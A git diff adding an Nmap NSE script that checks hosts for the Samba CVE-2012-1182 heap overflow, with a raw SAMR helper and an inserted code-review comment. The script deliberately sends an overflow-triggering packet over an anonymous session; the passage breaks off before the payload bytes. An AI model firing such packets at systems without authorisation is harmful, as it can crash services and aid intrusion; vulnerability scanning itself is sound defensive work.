diff --git a/CHANGELOG b/CHANGELOG
index ce4ce2620..25cd4e3d3 100644
--- a/CHANGELOG
+++ b/CHANGELOG
@@ -1,6 +1,9 @@
# Nmap Changelog ($Id$); -*-text-*-
-o [NSE] Added the dns-check-zone script that checks DNS configuration against
+o [NSE] Added the script samba-vuln-cve-2012-1182 which detects the SAMBA CVE
+ 2012-1182 vulnerability. [Aleksandar Nikolic]
+
+o [NSE] Added the script dns-check-zone that checks DNS configuration against
best practices including RFC 1912. [Patrik Karlsson]
o [NSE] Added the http-gitweb-projects-enum that queries a gitweb for a list
diff --git a/nselib/msrpc.lua b/nselib/msrpc.lua
index 178d8f6d7..f85d4c8ac 100644
--- a/nselib/msrpc.lua
+++ b/nselib/msrpc.lua
@@ -1584,6 +1584,29 @@ function samr_openalias(smbstate, domain_handle, rid)
return true, result
end
+---Call the GetAliasMembership function.
+--Sends the "raw" data, without marshaling.
+--
+--@param smbstate The SMB state table
+--@param alias_handle The alias_handle, already marshaled
+--@param args Actuall data to send, already marshaled
+--@return (status, result) If status is false, result is an error message. Otherwise, result is a table of values.
+function samr_getaliasmembership(smbstate, alias_handle,args)
+ local status, result
+ local arguments
+
+ arguments = ''
+
+ arguments = arguments .. alias_handle .. args
+ -- Do the call
+ status, result = call_function(smbstate, 0x10, arguments)
+ if(status ~= true) then
+ return false, result
+ end
+
+ return true, result
+end
+
---Call the GetMembersInAlias function, which retrieves a list of users in
-- a group.
--
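Review bot: samr_getaliasmembership builds its payload with `arguments .. alias_handle .. args` and never checks that either value is a string, so a nil or unmarshaled argument fails with a bare Lua "attempt to concatenate" error out of the RPC layer instead of the `false, err` pair the function otherwise returns after call_function. Because this helper deliberately bypasses marshaling and forwards caller bytes straight to SAMR opnum 0x10, the guard should sit at the top so the failure is reported where it happens; the `local arguments` / `arguments = ''` preamble then collapses into the call itself. The doc block should also say that 0x10 is the GetAliasMembership opnum and fix the typo `Actuall` to `Actual`; the function is complete within the hunk, between the visible tail of samr_openalias and the head of the GetMembersInAlias doc block.
```lua
function samr_getaliasmembership(smbstate, alias_handle, args)
  if type(alias_handle) ~= "string" or type(args) ~= "string" then
    return false, "samr_getaliasmembership: alias_handle and args must be pre-marshaled strings"
  end
  -- Opnum 0x10 is GetAliasMembership; the payload is forwarded as-is, without marshaling
  local status, result = call_function(smbstate, 0x10, alias_handle .. args)
  -- … unchanged: status check and (status, result) return …
```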
diff --git a/scripts/samba-vuln-cve-2012-1182.nse b/scripts/samba-vuln-cve-2012-1182.nse
new file mode 100644
index 000000000..68c5aea3a
--- /dev/null
+++ b/scripts/samba-vuln-cve-2012-1182.nse
@@ -0,0 +1,127 @@
+description = [[
+Check if the machine is vulnerable to Samba heap overflow vulnerability
+marked with CVE-2012-1182.
+
+Samba versions 3.6.3 and all versions previous to this are affected by
+a vulnerability that allows remote code execution as the "root" user
+from an anonymous connection.
+
+
+CVE-2012-1182 marks multiple heap overflow vulnerabilities located in
+PIDL based autogenerated code. This check script is based on PoC by ZDI
+marked as ZDI-CAN-1503. Vulnerability lies in ndr_pull_lsa_SidArray
+function where an attacker is under control of num_sids and can cause
+insuficient memory to be allocated, leading to heap buffer overflow
+and posibility of remote code execution.
+
+Script builds a malitious packet and makes a SAMR GetAliasMembership
+call which triggers the vulnerability. On the vulnerable system,
+connection is droped and result is "Failed to receive bytes after 5 attempts".
+On patched system, samba throws an error and result is "MSRPC call
+returned a fault (packet type)".
+
+References:
+* https://bugzilla.samba.org/show_bug.cgi?id=8815
+* http://www.samba.org/samba/security/CVE-2012-1182
+
+]]
+
+-----------------------------------------------------------------------
+---
+-- @usage
+-- nmap --script=samba-vuln-cve-2012-1182 -p 139
+-- @output
+-- PORT STATE SERVICE
+-- 139/tcp open netbios-ssn
+--
+-- Host script results:
+-- | samba-vuln-cve-2012-1182:
+-- | VULNERABLE:
+-- | SAMBA remote heap overflow
+-- | State: VULNERABLE
+-- | IDs: CVE:CVE-2012-1182
+-- | Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
+-- | Description:
+-- | Samba versions 3.6.3 and all versions previous to this are affected by
+-- | a vulnerability that allows remote code execution as the "root" user
+-- | from an anonymous connection.
+-- |
+-- | Disclosure date: 2012-03-15
+-- | References:
+-- | http://www.samba.org/samba/security/CVE-2012-1182
+-- |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182
+
+author = "Aleksandar Nikolic"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"vuln","intrusive"}
+
+require 'msrpc'
+require 'smb'
+require 'stdnse'
+require 'vulns'
+hostrule = function(host)
+ return smb.get_port(host) ~= nil
+end
+
+action = function(host,port)
+
+ local result, stats
+ local response = {}
+
+ local samba_cve = {
+ title = "SAMBA remote heap overflow",
+ IDS = {CVE = 'CVE-2012-1182'},
+ risk_factor = "HIGH",
+ scores = {
+ CVSSv2 = "10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)",
+ },
+ description = [[
+Samba versions 3.6.3 and all versions previous to this are affected by
+a vulnerability that allows remote code execution as the "root" user
+from an anonymous connection.
+ ]],
+ references = {
+ 'http://www.samba.org/samba/security/CVE-2012-1182',
+ },
+ dates = {
+ disclosure = {year = '2012', month = '03', day = '15'},
+ },
+ exploit_results = {},
+ }
+
+ local report = vulns.Report:new(SCRIPT_NAME, host, port)
+ samba_cve.state = vulns.STATE.NOT_VULN
+
+ -- create SMB session
+ status, smbstate = msrpc.start_smb(host, msrpc.SAMR_PATH,true)
+ if(status == false) then
+ return false, smbstate
+ end
+
+ -- bind to SAMR service
+ status, bind_result = msrpc.bind(smbstate, msrpc.SAMR_UUID, msrpc.SAMR_VERSION, nil)
+ if(status == false) then
+ msrpc.stop_smb(smbstate)
+ return false, bind_result
+ end
+
+ -- create malicious packet, same as in the PoC
+ data = bin.pack("